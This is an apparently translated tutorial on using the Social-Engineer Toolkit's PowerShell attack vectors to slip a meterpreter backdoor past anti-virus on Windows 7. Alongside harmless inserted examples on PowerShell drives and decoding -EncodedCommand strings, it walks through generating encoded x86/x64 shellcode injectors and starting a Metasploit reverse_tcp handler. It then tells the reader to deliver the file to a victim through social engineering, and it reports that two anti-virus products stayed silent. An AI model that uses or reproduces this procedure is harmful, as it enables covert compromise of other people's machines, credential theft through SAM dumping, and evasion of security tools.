SET: Bypassing anti-virus on Windows 7 using PowerShell

Source: Internet
Author: User

Windows PowerShell is a command-line shell and scripting environment that lets command-line users and script writers take advantage of the .NET Framework. It introduces a number of new concepts that extend what you can do in the Windows Command Prompt and Windows Script Host environments.
With Windows PowerShell you can enter commands interactively and also create and run scripts. Type a command at the PowerShell prompt to find the cmdlet that performs a task; you can then save those commands, or copy them out of the command history into a file, and use them as a script.
Start by identifying the providers installed in PowerShell: they tell you what PowerShell can reach by default. A provider exposes the data held in some store through a simple, uniform access method, so working with it is as easy as browsing a directory tree on a disk. Each provider presents the locations it stores information in as a "drive" with a directory structure, which is easy to understand. Just as you would open the D: drive in Explorer and then the WIN32 directory to get at a setup.exe stored there, to access data in the registry you simply switch to the registry drive with the Set-Location command and then list its children with the Get-ChildItem command.
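The following is an added example, not code from the original article, showing the provider and drive navigation described above in a Windows PowerShell session (it sticks to PowerShell 2.0 syntax so it also runs on a stock Windows 7 box). The registry paths and certificate store used are ordinary well-known locations chosen for illustration.

```powershell
# Added example: enumerate the providers and drives PowerShell exposes, then
# walk the registry with the same cmdlets you would use on a file system.

# Which providers are loaded, and which drives each one backs.
Get-PSProvider | Select-Object Name, Drives | Format-Table -AutoSize

# Every drive, including the non-file-system ones (HKLM:, HKCU:, Env:, Cert:, ...).
Get-PSDrive | Select-Object Name, Provider, Root | Format-Table -AutoSize

# Navigate the registry exactly as you would a directory tree.
Set-Location HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion
Get-ChildItem -Name                    # subkeys under CurrentVersion

# Registry *values* (as opposed to subkeys) are read with Get-ItemProperty.
# The Run key is a classic autostart location worth checking on any host.
Get-ItemProperty -Path .\Run

# The same idiom works for the environment block and the certificate stores.
Get-ChildItem Env: | Where-Object { $_.Name -like 'PROCESSOR_ARCH*' }
Get-ChildItem Cert:\LocalMachine\Root | Select-Object -First 3 Subject, Thumbprint

Set-Location C:\                       # back to the file-system drive
```

Get-PSDrive is the quickest way to see what a given PowerShell build can touch without any extra modules: if HKLM: and Cert: are listed, the registry and certificate stores are reachable from a script without calling out to reg.exe or certutil.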

At the BSides security conference, David Kennedy, the author of SET, showed some new methods for bypassing anti-virus using PowerShell.

Update SET first:

root@Dis9Team:/pen/set# svn update

Select 1) Social-Engineering Attacks, then select 10) Powershell Attack Vectors.

Select the backdoor type here:

1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database

Select 1) Powershell Alphanumeric Shellcode Injector.


Then wait for SET to finish encoding the payload. SET always generates both the 32-bit and the 64-bit version.

set:powershell> 1
set> IP address for the payload listener: 5.5.5.2
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
Enter the port number for the reverse [443]:
[*] Generating x64-based powershell injection code...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
set> Do you want to start the listener now [yes/no]: yes
set:powershell> Select x86 or x64 victim machine [default: x64]: x64
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

(Metasploit "Matrix" ASCII-art banner omitted)

       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 914 exploits - 527 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
       =[ svn r15684 updated 9 days ago (2012.07.26)

Warning: This copy of the Metasploit Framework was last updated 9 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

https://community.rapid7.com/docs/DOC-1306
 
[*] Processing reports/powershell.rc for ERB directives.
resource (reports/powershell.rc)> use multi/handler
resource (reports/powershell.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (reports/powershell.rc)> set lport 443
lport => 443
resource (reports/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (reports/powershell.rc)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

The generated backdoor files are saved here:
 
root@Dis9Team:/pen/set/reports/powershell# pwd
/pen/set/reports/powershell
root@Dis9Team:/pen/set/reports/powershell# ls
powershell.rc  x64_powershell_injection.txt  x86_powershell_injection.txt
root@Dis9Team:/pen/set/reports/powershell# cat x64_powershell_injection.txt
..............
-------- (long encoded output omitted) --------
root@Dis9Team:/pen/set/reports/powershell#

Deliver the x86 or x64 injection file that matches the target's system to the victim through social engineering and run it there.
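The two mechanics the procedure above relies on are that the generated file is "encoded to bypass execution restriction" and that the x86 or x64 version has to match the bitness of the PowerShell process it runs in. The following is an added example, written for this page and not SET's own code, that shows both: it packs a benign script into the -EncodedCommand form (base64 of UTF-16LE), which the execution policy does not apply to because that policy only governs script files; it picks the 32-bit or 64-bit powershell.exe on a 64-bit host (SysWOW64 versus System32); and it decodes such a command line back to plain text, which is the check a defender runs on a captured process command line. The function names are this example's own, and the payload here only prints the bitness it is running under.

```powershell
# Added example (not from SET): build, run and decode an -EncodedCommand
# payload under the matching process bitness. PowerShell 2.0 syntax so it
# also runs on Windows 7.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory=$true)][string]$Script)
    # powershell.exe -EncodedCommand expects base64 of the script as UTF-16LE.
    # The execution policy restricts .ps1 files, not a command string passed
    # this way, so this runs on a default "Restricted" machine.
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory=$true)][string]$CommandLine)
    # Reverse of the above for a captured command line: pull the argument after
    # -EncodedCommand (or its accepted abbreviations -enc / -ec / -e) and decode.
    if ($CommandLine -match '(?i)-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)') {
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
    }
    return $null
}

function Get-PowerShellPath {
    param([ValidateSet('x86','x64')][string]$Arch)
    # On a 64-bit host System32 holds the 64-bit powershell.exe and SysWOW64
    # the 32-bit one; a 32-bit host only has System32. Shellcode of one
    # bitness cannot run inside a process of the other, which is why SET
    # writes an x86 and an x64 file.
    $sysdir = if ($Arch -eq 'x86' -and [IntPtr]::Size -eq 8) { 'SysWOW64' } else { 'System32' }
    Join-Path $env:windir "$sysdir\WindowsPowerShell\v1.0\powershell.exe"
}

# Benign stand-in for the body of x86_/x64_powershell_injection.txt.
$payload = 'Write-Output ("running as {0}-bit PowerShell" -f ([IntPtr]::Size * 8))'
$encoded = ConvertTo-EncodedCommand $payload

# Run the same encoded command once per available bitness.
foreach ($arch in 'x86','x64') {
    $exe = Get-PowerShellPath $arch
    if (Test-Path $exe) {
        & $exe -NoProfile -NonInteractive -EncodedCommand $encoded
    }
}

# Defender's side: decode the command line we just produced and confirm it
# round-trips to the original script text.
$decoded = ConvertFrom-EncodedCommand "powershell.exe -NoProfile -EncodedCommand $encoded"
if ($decoded -ne $payload) { throw 'decode mismatch' }
$decoded
```

On a 64-bit Windows 7 host the loop prints both a 32-bit and a 64-bit line, which is exactly the distinction the "Select x86 or x64 victim machine" prompt in SET maps onto. The decoder is the piece to keep handy when reviewing process-creation logs: a long base64 argument after -enc or -e is the first thing to expand before deciding what a PowerShell launch actually did.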

After running it, neither Kingsoft (Jinshan) nor 360 anti-virus raised an alert.


References
http://www.secmaniac.com/files/PowerShell_Defcon.pdf
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
http://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.html
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
http://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx
